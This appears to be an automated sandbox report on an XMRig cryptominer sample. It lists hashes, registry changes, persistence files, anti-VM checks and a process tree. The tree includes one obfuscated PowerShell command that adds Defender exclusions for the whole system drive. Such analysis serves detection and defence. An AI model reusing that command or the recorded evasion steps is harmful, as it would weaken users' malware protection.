xmrig | d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f

Analysis

max time kernel
301s
max time network
288s
platform
windows7_x64
resource
win7-20220414-en
submitted
14-07-2022 22:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
Size

7.5MB
MD5

dd9d0dfb0b3d274e3a418084142afcc6
SHA1

ffacc4206b3b84a6d2c105390cf1815e022e02a5
SHA256

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f
SHA512

d21d35069ddedc02680f8a93f37f4ddb586b0f528bebbe13f1f917de1f9c9e87c79ba29169cd30a65f227c00db52de941d64b43b0727b9809f7f4885a58aa516

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/764-164-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-162-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-166-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-167-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-168-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-170-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-174-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-173-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-172-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-176-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-178-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-179-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/764-181-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1328 setup.exe
1600 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1332 icacls.exe
952 takeown.exe
1732 icacls.exe
1984 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1328	setup.exe
1600	updater.exe

pid	process
1332	icacls.exe
952	takeown.exe
1732	icacls.exe
1984	takeown.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 2 IoCs

Processes:

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exetaskeng.exe

pid process

1792 d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
1636 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1984 takeown.exe
1332 icacls.exe
952 takeown.exe
1732 icacls.exe

pid	process
1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
1636	taskeng.exe

pid	process
1984	takeown.exe
1332	icacls.exe
952	takeown.exe
1732	icacls.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral1/memory/1328-59-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/1328-65-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
C:\Windows\Temp\setup.exe	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1600-107-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/1600-110-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1328 setup.exe
1600 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1724 set thread context of 764 1724 conhost.exe explorer.exe

pid	process
1328	setup.exe
1600	updater.exe

description	pid	process	target process
PID 1724 set thread context of 764	1724	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1060 sc.exe
1616 sc.exe
844 sc.exe
1704 sc.exe
1212 sc.exe
1684 sc.exe
1268 sc.exe
1032 sc.exe
1708 sc.exe
1756 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

860 schtasks.exe

pid	process
1060	sc.exe
1616	sc.exe
844	sc.exe
1704	sc.exe
1212	sc.exe
1684	sc.exe
1268	sc.exe
1032	sc.exe
1708	sc.exe
1756	sc.exe

pid	process
860	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 46 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000507c2fdce6c5a44fa24a4aaba45223ba00000000020000000000106600000001000020000000b813fe33e059fc9a747b8806d0b537857e8e24c682e84b6de6352ff3e64160c1000000000e80000000020000200000004e6777a0204dad37d07a3c0b8a40a7af34375e619e1767fa9d1231c0fb1cdabf20000000b8a472af7e39af0b92d8a5d7e67426a430ad0e153e699e06177d541dc39975a1400000007eb404900e728e3c7fa23e994e0f28e21b0db290fc93784e722669693484850e89d620ee813bfbe6304a59dee4c243d5dc066357a7e15c64a2ccd35da01dc857	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F6F2CEE1-03D3-11ED-843B-FABB0CD78C51} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "364609419"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 008c51cae097d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "16"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "16"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000507c2fdce6c5a44fa24a4aaba45223ba00000000020000000000106600000001000020000000036cc4b14e2ef585b1550f89389ecf25f0f802e2631bcf5d3ac0d681d66807c4000000000e80000000020000200000004ea40d40e802d530a370e1bba95abd02edcd647fb6b9b9263a611eaa249f08fb90000000a047c8ffa86309f55dfeebba1042c3fa2c6e60cf4dd4649febc672b71d87959bd080584e5ea0d1da562ac4a0f08a71a071a2d0ccc2b780625f5a79db2158e2690b57d4203732d6794d9481583770762ff9827db45b458fba8348e73dc1e5e187f689762d0eef03905b8e2dd4ad086216e86b5b2b3cca9edb80768f9d2ce4576d72a720fc48662ab6c7322e9b411e32cd40000000a14c858e89b8e7623a51882d9ce583795f1cad9260e113adc8cfed7d389e9af4acaaa5a8ecdc8a5f0f04449075d0c2d44aa2b23d86ffcc2d0b51e510ad7545bf	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2007d7bde097d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
680	reg.exe
992	reg.exe
1756	reg.exe
1864	reg.exe
336	reg.exe
1852	reg.exe
1028	reg.exe
1328	reg.exe
1724	reg.exe
552	reg.exe
324	reg.exe
1364	reg.exe
1432	reg.exe
840	reg.exe
1604	reg.exe
1824	reg.exe
1408	reg.exe
1032	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
1640	powershell.exe
1176	conhost.exe
764	powershell.exe
1724	conhost.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe
764	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeschtasks.exetakeown.execonhost.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeShutdownPrivilege	948	powercfg.exe
Token: SeDebugPrivilege	1176	conhost.exe
Token: SeShutdownPrivilege	1360	powercfg.exe
Token: SeShutdownPrivilege	1600	powercfg.exe
Token: SeShutdownPrivilege	1680	powercfg.exe
Token: SeTakeOwnershipPrivilege	1984	takeown.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeShutdownPrivilege	432	powercfg.exe
Token: SeShutdownPrivilege	1784	powercfg.exe
Token: SeShutdownPrivilege	1992	powercfg.exe
Token: SeShutdownPrivilege	1760	schtasks.exe
Token: SeTakeOwnershipPrivilege	952	takeown.exe
Token: SeDebugPrivilege	1724	conhost.exe
Token: SeLockMemoryPrivilege	764	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1672 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1672 iexplore.exe
1672 iexplore.exe
1700 IEXPLORE.EXE
1700 IEXPLORE.EXE
1700 IEXPLORE.EXE
1700 IEXPLORE.EXE

pid	process
1672	iexplore.exe

pid	process
1672	iexplore.exe
1672	iexplore.exe
1700	IEXPLORE.EXE
1700	IEXPLORE.EXE
1700	IEXPLORE.EXE
1700	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exesetup.execmd.exeiexplore.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1792 wrote to memory of 1328	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1792 wrote to memory of 1328	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1792 wrote to memory of 1328	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1792 wrote to memory of 1328	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1792 wrote to memory of 2040	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2040	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2040	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2040	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1328 wrote to memory of 1176	1328	setup.exe	conhost.exe
PID 1328 wrote to memory of 1176	1328	setup.exe	conhost.exe
PID 1328 wrote to memory of 1176	1328	setup.exe	conhost.exe
PID 1328 wrote to memory of 1176	1328	setup.exe	conhost.exe
PID 2028 wrote to memory of 1672	2028	cmd.exe	iexplore.exe
PID 2028 wrote to memory of 1672	2028	cmd.exe	iexplore.exe
PID 2028 wrote to memory of 1672	2028	cmd.exe	iexplore.exe
PID 2028 wrote to memory of 1672	2028	cmd.exe	iexplore.exe
PID 1672 wrote to memory of 1700	1672	iexplore.exe	IEXPLORE.EXE
PID 1672 wrote to memory of 1700	1672	iexplore.exe	IEXPLORE.EXE
PID 1672 wrote to memory of 1700	1672	iexplore.exe	IEXPLORE.EXE
PID 1672 wrote to memory of 1700	1672	iexplore.exe	IEXPLORE.EXE
PID 1176 wrote to memory of 1640	1176	conhost.exe	powershell.exe
PID 1176 wrote to memory of 1640	1176	conhost.exe	powershell.exe
PID 1176 wrote to memory of 1640	1176	conhost.exe	powershell.exe
PID 1176 wrote to memory of 1116	1176	conhost.exe	cmd.exe
PID 1176 wrote to memory of 1116	1176	conhost.exe	cmd.exe
PID 1176 wrote to memory of 1116	1176	conhost.exe	cmd.exe
PID 1176 wrote to memory of 1096	1176	conhost.exe	cmd.exe
PID 1176 wrote to memory of 1096	1176	conhost.exe	cmd.exe
PID 1176 wrote to memory of 1096	1176	conhost.exe	cmd.exe
PID 1116 wrote to memory of 1704	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1704	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1704	1116	cmd.exe	sc.exe
PID 1096 wrote to memory of 948	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 948	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 948	1096	cmd.exe	powercfg.exe
PID 1116 wrote to memory of 1756	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1756	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1756	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1212	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1212	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1212	1116	cmd.exe	sc.exe
PID 1096 wrote to memory of 1360	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1360	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1360	1096	cmd.exe	powercfg.exe
PID 1116 wrote to memory of 1684	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1684	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1684	1116	cmd.exe	sc.exe
PID 1096 wrote to memory of 1600	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1600	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1600	1096	cmd.exe	powercfg.exe
PID 1116 wrote to memory of 1268	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1268	1116	cmd.exe	sc.exe
PID 1116 wrote to memory of 1268	1116	cmd.exe	sc.exe
PID 1096 wrote to memory of 1680	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1680	1096	cmd.exe	powercfg.exe
PID 1096 wrote to memory of 1680	1096	cmd.exe	powercfg.exe
PID 1116 wrote to memory of 1864	1116	cmd.exe	reg.exe
PID 1116 wrote to memory of 1864	1116	cmd.exe	reg.exe
PID 1116 wrote to memory of 1864	1116	cmd.exe	reg.exe
PID 1116 wrote to memory of 1328	1116	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
"C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\cmd.exe
